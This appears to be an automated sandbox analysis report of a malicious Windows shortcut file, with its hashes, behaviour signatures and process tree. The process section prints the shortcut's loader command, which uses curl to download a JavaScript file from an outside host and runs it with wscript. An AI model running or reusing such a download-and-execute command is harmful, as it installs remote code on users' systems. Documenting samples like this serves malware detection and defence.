Overview

overview

7

Static

static

Iddistinctio.lnk

windows7-x64

3

Iddistinctio.lnk

windows10-2004-x64

7

Resubmissions

14-09-2022 15:43

220914-s535ysedgr 7

14-09-2022 11:44

220914-nwcjesdhdq 7

Analysis

  • max time kernel
    42s
  • max time network
    45s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    14-09-2022 11:44

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Iddistinctio.lnk

  • Size

    2KB

  • MD5

    c6429a11887977701ae6c4e7b1faab05

  • SHA1

    c2779ef3e823702979df08486fd4bb6c1b7212f9

  • SHA256

    2f38328d6a94d2832d9c7f2a15147aef41f615557dc2787599906b7cbd3bb338

  • SHA512

    e025d1e842f77d9275b89acd327ca26f8a8fce340db7eb3cf7d6aa6aeb356cf99276d8b049e38d70d2b754adf377b0d94d4da6365c46bc141035a9d183cb1ef6

Score
3/10

Malware Config

Signatures

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\Iddistinctio.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1648
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /q /C echo 'Oj6b' && MD "C:\ProgramData\A_Np\fcA" && echo "zLH" && curl.exe --output C:\ProgramData\A_Np\fcA\MJ.aRq.GCk.js https://ap2web.com/MwS/13.html && cd "C:\ProgramData\A_Np\fcA" && wscript MJ.aRq.GCk.js
      2⤵
        PID:1288

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1288-88-0x0000000000000000-mapping.dmp

      Download

    • memory/1648-54-0x000007FEFB931000-0x000007FEFB933000-memory.dmp

      Filesize

      8KB

      Download